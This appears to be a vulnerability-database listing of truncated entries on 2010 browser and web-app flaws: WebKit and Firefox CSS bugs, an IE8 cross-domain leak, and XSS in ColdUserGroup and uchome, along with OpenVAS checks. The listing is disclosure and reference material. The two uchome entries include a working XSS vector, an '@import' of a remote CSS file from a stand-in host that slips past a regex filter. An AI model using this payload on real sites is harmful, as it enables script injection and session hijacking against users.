Apple Safari Webkit Button First-Letter Style Rendering Code Execution (CVE-2010-1392)

Safari is a web browsing application developed by Apple. Safari browsing functionality is built around the set of components called WebKit. WebKit is a development toolkit which allows third party developers to build applications that use Internet technologies such as HTML, HTTP, and others. A...

Firefox Plugin Parameter EnsureCachedAttrParamArrays Code Execution

Exploit for windows platform in category dos / poc =================================================================== Firefox Plugin Parameter EnsureCachedAttrParamArrays Code Execution =================================================================== Title : Firefox Plugin Parameter...

CVE-2010-3324

The toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, Office SharePoint Server 2007 SP2, Groove Server 2010, and Office Web Apps, allows remote attackers to bypass the cross-site scriptin...

Cross site scripting

The toStaticHTML function in Microsoft Internet Explorer 8, and the SafeHTML function in Microsoft Windows SharePoint Services 3.0 SP2, SharePoint Foundation 2010, Office SharePoint Server 2007 SP2, Groove Server 2010, and Office Web Apps, allows remote attackers to bypass the cross-site scriptin...

ColdUserGroup 1.6 Bypass / Cross Site Scripting

Exploit Title: ColdUserGroup - Version 1.6 bypass/XSS Vulnerabilities Date: 09/09/2010 Author: Sangteamtham Software Link: http://www.coldgen.com/index.cfm?ColdGen=ProductDetails&ProductID=8 Version: 1.22 Tested on: Windows 7 1.Description: Built using Fusebox and adhering to CSS/XHTML standards...

Microsoft IE CSS处理跨域信息泄露漏洞

BUGTRAQ ID: 42993 Internet Explorer是Windows操作系统中默认捆绑的web浏览器。 Internet Explorer允许包含跨来源的内容，且CSS解析器在处理内容时是容错的。如果用户在页面中注入某些内容并以样式表的方式导入，就可以获得其他域中网页的敏感信息。 Microsoft Internet Explorer 8.0 Microsoft Internet Explorer 7.0 Microsoft Internet Explorer 6.0 厂商补丁： Microsoft ---------...

Mandriva Update for mozilla-thunderbird MDVSA-2010:169 (mozilla-thunderbird)

Check for the Version of mozilla-thunderbird OpenVAS Vulnerability Test Mandriva Update for mozilla-thunderbird MDVSA-2010:169 mozilla-thunderbird Authors: System Generated Check Copyright: Copyright c 2010 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can...

Microsoft Internet Explorer 7/8 - CSS Handling Cross Domain Information Disclosure

source: https://www.securityfocus.com/bid/42993/info Microsoft Internet Explorer is prone to a cross-domain information-disclosure vulnerability because the application fails to enforce the same-origin policy. An attacker can exploit this issue by enticing an unsuspecting user into viewing a page...

Nasty Data-Stealing Bug Haunts Internet Explorer 8

There’s an unpatched vulnerability in Internet Explorer 8 that enables simple data-stealing attacks by Web-based attackers and could lead to an attacker hijacking a user’s authenticated session on a third-party site. The flaw, which a researcher said may have been known since 2008, lies in the wa...

uchome 2.0 存在持久XSS漏洞

看源码分析的，出错位置较敏感，而且基本没有利用限制，个人主页自定义风格时，可@import外部css文件 uchome 2.0 临时解决方法： implode应该是import的笔误 /expression|vbscript|javascript|import/i 以下在uchome 简体utf-8 2.0测试IE6,IE7,IE8通过. @import urlhttp://xxx.com/1.css; 包含远程css文件，可以在1.css中写入XSS利用. 分析代码 cptheme.php 92行17行调用 function checksecurity$str...

Debian Security Advisory DSA 2075-1 (xulrunner)

The remote host is missing an update to xulrunner announced via advisory DSA 2075-1. OpenVAS Vulnerability Test $Id: deb20751.nasl 6614 2017-07-07 12:09:12Z cfischer $ Description: Auto-generated from advisory DSA 2075-1 xulrunner Authors: Thomas Reinke Copyright: Copyright c 2010 E-Soft Inc...

Debian: Security Advisory (DSA-2075-1)

The remote host is missing an update for the Debian SPDX-FileCopyrightText: 2010 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

Table2CSS Denial of Service PoC

Exploit for php platform in category dos / poc =============================== Table2CSS Denial of Service PoC =============================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /...

Apple Safari Webkit CSS Charset Text Transformation Code Execution (CVE-2010-1770)

Safari is a web browsing application developed by Apple. Safari browsing functionality is built around the set of components called WebKit. WebKit is a development toolkit which allows third party developers to build applications that use Internet technologies such as HTML, HTTP, and others. A...

uchome持久XSS(2.0版本测试通过)

简要描述： 看源码分析的，出错位置较敏感，而且基本没有利用限制 详细说明： 个人主页自定义风格时，可@import外部css文件 漏洞证明： 以下在uchome 简体utf-8 2.0测试IE6,IE7,IE8通过. @import urlhttp://xxx.com/1.css; 包含远程css文件，可以在1.css中写入XSS利用. 分析代码 cptheme.php 92行17行调用 function checksecurity$str //执行一系列的过滤验证是否合法的CSS $filter = array '//\n\r.+?\n\r\//is', '/^a-z0-9+/i',...

CVE-2010-2752

Integer overflow in an array class in Mozilla Firefox 3.5.x before 3.5.11 and 3.6.x before 3.6.7, Thunderbird 3.0.x before 3.0.6 and 3.1.x before 3.1.1, and SeaMonkey before 2.0.6 allows remote attackers to execute arbitrary code by placing many Cascading Style Sheets CSS values in an array,...

Integer overflow

Integer overflow in an array class in Mozilla Firefox 3.5.x before 3.5.11 and 3.6.x before 3.6.7, Thunderbird 3.0.x before 3.0.6 and 3.1.x before 3.1.1, and SeaMonkey before 2.0.6 allows remote attackers to execute arbitrary code by placing many Cascading Style Sheets CSS values in an array,...

Memory corruption

The counters functionality in the Cascading Style Sheets CSS implementation in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4; and webkitgtk before 1.2.6; allows remote attackers to execute arbitrary code or cause a denial of servi...

CVE-2010-1784

CVE-2010-1784 is listed in MiracleLinux AXSA-2011-34:01 as a vulnerability fixed in webkitgtk-1.2.6-2.AXS4. The advisory groups CVE-2010-1784 with other WebKitGTK+/WebKit flaws and notes that these issues are resolved by updating the affected package. The provided documents do not include detaile...

CVE-2010-1784

The counters functionality in the Cascading Style Sheets CSS implementation in WebKit in Apple Safari before 5.0.1 on Mac OS X 10.5 through 10.6 and Windows, and before 4.1.1 on Mac OS X 10.4; and webkitgtk before 1.2.6; allows remote attackers to execute arbitrary code or cause a denial of servi...